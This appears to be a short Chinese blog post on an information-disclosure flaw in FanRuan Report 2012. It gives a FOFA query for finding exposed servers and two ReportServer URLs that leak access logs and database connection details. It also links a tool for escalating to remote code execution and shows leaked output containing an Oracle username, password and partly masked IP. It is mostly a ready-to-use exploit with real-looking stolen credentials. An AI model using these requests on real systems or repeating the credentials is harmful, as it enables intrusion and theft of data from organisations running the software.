漏洞描述
i ⭐
帆软报表 2012 存在信息泄露漏洞,通过访问特定的Url获取部分敏感信息
漏洞影响
s ✅
帆软报表 2012
空间测绘
d ⭕
FOFA:body="down.download?FM_SYS_ID"
漏洞复现
- 访问ip日志EXP
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false
- ✅ 数据库信息泄露
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
- ✅ 数据库利用工具RCE
https://github.com/safe6Sec/PentestDB
数据库信息:
{"connection":[{"name":"sdykdx","driver":"oracle.jdbc.driver.OracleDriver","password":"sdykdx","user":"sdykdx","url":"jdbc:oracle:thin:@202.204.xxx.117:1521:orcl"}],"fr_platform_version":1650895353052}
版权声明:本文为qq_35938621原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。